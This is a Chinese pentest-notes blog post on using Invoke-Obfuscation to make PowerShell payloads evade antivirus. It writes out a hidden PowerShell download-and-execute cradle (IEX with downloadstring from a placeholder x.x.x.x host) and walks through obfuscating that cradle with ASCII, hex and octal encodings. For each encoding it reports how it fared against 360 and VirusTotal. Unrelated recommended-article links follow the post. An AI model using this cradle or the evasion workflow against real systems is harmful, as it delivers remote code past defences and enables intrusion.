0x01 项目地址

https://github.com/danielbohannon/Invoke-Obfuscation

0x02 用法

  1. 生成powershell:

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x:80/b'))"
  1. 下载并用powershell进入项目目录执行:Import-Module .\Invoke-Obfuscation.psd1;Invoke-Obfuscation
    如果报错请先执行:Set-ExecutionPolicy Unrestricted
  2. 输入要混淆的PS:set scriptblock 'powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x:80/b'))"'
    (设置ps文件:set scriptpath C:\0_poweshell\msf-crow.ps1
  3. 输入ENCODING选择要编码的方式:

0x03 编码测试

1. ASCII

  1. 选择1:

  2. 输出:out PowerShellCodeASCII.ps1

  3. 免杀与上线测试

  • 360静态查杀:
  • 360动态查杀:

  • VT:5/58

2. Hex

  1. undo 撤销上次命令:

  2. 编码并输出:

  3. 免杀与上线测试

  • 360静态查杀:

  • 360动态查杀:

  • VT:9/59

3. Octal

  1. 编码并输出:

  2. 免杀与上线测试

  • 360静态查杀:

  • 360动态查杀:

  • VT:7/58

不再赘述。。。

【渗透测试笔记】之【免杀工具——使用Invoke-Obfuscation代码混淆免杀powershell】相关推荐

  1. 渗透测试入门24之渗透测试参考书、课程、工具、认证

    白帽子渗透测试入门资源:参考书.课程.工具.认证文章目录 前言 名词解析 Pwk课程与OSCP证书 CTF 工具 参考书 相关文献推荐 资源打包前言 初入渗透测试领域,过程中遇到不少错综复杂的知识,也 ...

  2. [在线挑战]【i春秋】渗透测试入门 —— 渗透测试笔记 --转

    [i春秋]渗透测试入门 -- 渗透测试笔记,原文 0x00 前言 本题算是一道较为综合的渗透题,要求对两个服务器系统进行渗透,第一个是基于齐博 CMS 的信息资讯平台 http://www.test. ...

  3. 渗透测试工程师都需要什么工具呢?网络安全(一)

    渗透测试是目前网络安全人士向往的工作之一.令人兴奋,含金量高,且对所有人敞开大门.无论你是准毕业生.在校生.信息安全从业人员,还是对渗透测试感兴趣的人群,只要专项能力过硬,就可以成为渗透测试工程师.那 ...

  4. web安全攻防渗透测试笔记

    第三章sqlmap (1)      安装sqlmap前,需要先安装Python3.X Python Releases for Windows | Python.org (2)      在环境变量p ...

  5. web安全攻防渗透测试笔记 (信安一班 李静)

    第三章sqlmap (1)      安装sqlmap前,需要先安装Python3.X Python Releases for Windows | Python.org (2)      在环境变量p ...

  6. 【渗透测试】密码暴力破解工具——九头蛇(hydra)使用详解及实战

    目录 九头蛇hydra 使用方法 案例分析 暴破ssh登录密码 环境介绍 开始爆破 破解成功 测试登录 各种协议破解汇总 FTP协议破解 http协议破解 https协议破解 路由器破解 http-p ...

  7. python网络安全设计_专为渗透测试人员设计的 Python 工具大合集

    如果你对漏洞挖掘.逆向工程分析或渗透测试感兴趣的话,我第一个要推荐给你的就是Python编程语言.Python不仅语法简单上手容易,而且它还有大量功能强大的库和程序可供我们使用.在这篇文章中,我们会给 ...

  8. 【渗透测试笔记】之【内网渗透——Windows系统散列值获取与防范】

    拓扑图 Windows系统散列值获取 1.通过CS模块获取用户凭证信息 在获取到目标主机权限后,我们可以抓取hash和dump明文密码,这两项功能都需要管理员权限,如果权限不足,先要进行提权操作. 抓 ...

  9. 渗透测试工程师都需要什么工具呢?网络安全(三)

    网站渗透测试是现阶段网络安全工作人员期待工作中之一.激动人心,含金量高,且对所有人张开怀抱.无论你是准毕业生.在校生.网络安全从业人员,还是对网站渗透测试有兴趣的群,仅需关键能力过硬,就能变成网站渗透 ...

  10. 渗透测试-2022红队必备工具列表总结​

    2022红队必备工具列表总结​ 文章目录 2022红队必备工具列表总结​ 一.信息收集 二.漏洞扫描 三.网站管理 四.在线工具 一.信息收集 1.AppInfoScanner 一款适用于以HVV行动 ...

最新文章

  1. 获取oracle数据库war报告,Oracle 数据库开发及SQL基础实战
  2. 一文讲解图像插值算法原理!附Python实现
  3. 微软Silverlight 3正式版已经出炉
  4. 一个servlet跳到另一个servlet_另一个太阳下的天与地
  5. Unable to Open User Login File
  6. adb.exe可能被其他程序关闭_木工中央除尘设备系统正式运行的操作程序
  7. 完美的项目从完美的表开始
  8. /boot/grub/grub.conf文件详解
  9. node-inspector使用方法
  10. 设计模式系列-创建者模式
  11. C# WPF MVVM开发框架Caliburn.Micro 关于Conventions⑧
  12. git 合并冲突_GIT提交记录和Revert commit过程分析
  13. 1003. 检查替换后的词是否有效
  14. PhotoShop制作空心圆角矩形
  15. Javascript 笔记与总结(2-1)Javascript 与 DOM
  16. 理解Virtual方法。
  17. android同花顺布局,同花顺首发 Android平板电脑炒股高清版
  18. 小米摄像头上传云服务器,杜老师说群晖:小米云摄像头无法对接群晖存储解决方法...
  19. 胡小胖:微商创业必备的软件工具
  20. Expeditious Cubing(浮点数处理)

热门文章

  1. (附源码)小程序 校园二手交易平台 毕业设计 191637
  2. 屏幕录制软件有哪些?4款超好用录屏软件下载,强烈推荐
  3. 强化学习Q-learning简单理解
  4. JavaScript 学习-42.jQuery 提交表单 submit() 方法
  5. 【总结】学堂云慕课-如何写好科研论文
  6. 飞鼠溪·狼(flying squirrel creek)-- BleedingWolves
  7. 计算机组成原理-概述篇
  8. 【菜鸟学Java】1:Java语言简介
  9. 物流企业matlab效率,基于DEA原理的物流企业综合效率评价
  10. ES6/7 + Babel 编译器-郭永峰-专题视频课程